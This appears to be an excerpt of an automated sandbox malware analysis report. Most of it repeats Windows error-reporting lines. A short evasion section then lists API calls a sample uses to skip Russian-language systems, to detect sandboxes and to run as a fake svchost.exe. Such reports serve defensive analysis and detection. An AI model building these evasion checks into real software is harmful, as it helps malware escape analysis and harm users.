Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Contains functionality to behave differently if execute on a Russian/Kazak computer
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C74920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,IsUserAnAdmin,IsUserAnAdmin,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 2_2_02C74920
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 6_2_01244920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 6_2_01244920
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 7_2_01044920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 7_2_01044920
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeCode function: 9_2_00A24920 PathAddBackslashA,CreateFileA,WriteFile,WriteFile,WriteFile,WriteFile,GetModuleFileNameA,WriteFile,WriteFile,WriteFile,GetUserNameA,WriteFile,WriteFile,WriteFile,GetEnvironmentVariableA,WriteFile,WriteFile,WriteFile,GetSystemDefaultLangID,memset,WriteFile,WriteFile,WriteFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,WriteFile,WriteFile,WriteFile,GetDateFormatA,WriteFile,WriteFile,WriteFile,GetTimeFormatA,WriteFile,WriteFile,WriteFile,GetTimeZoneInformation,_snprintf,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,WriteFile,GetSystemWindowsDirectoryA,WriteFile,WriteFile,WriteFile,WriteFile,#680,#680,WriteFile,WriteFile,GetHandleInformation,CloseHandle, mov dword ptr [ebp-18h], 00000419h 9_2_00A24920
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Users\user\Desktop\UMwpXhA46R.exeCode function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegCloseKey,GetUserNameA,CharUpperA,strstr,strstr,strstr,strstr,GetSystemWindowsDirectoryA,GetVolumeInformationA,GetModuleFileNameA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,0_2_00403900
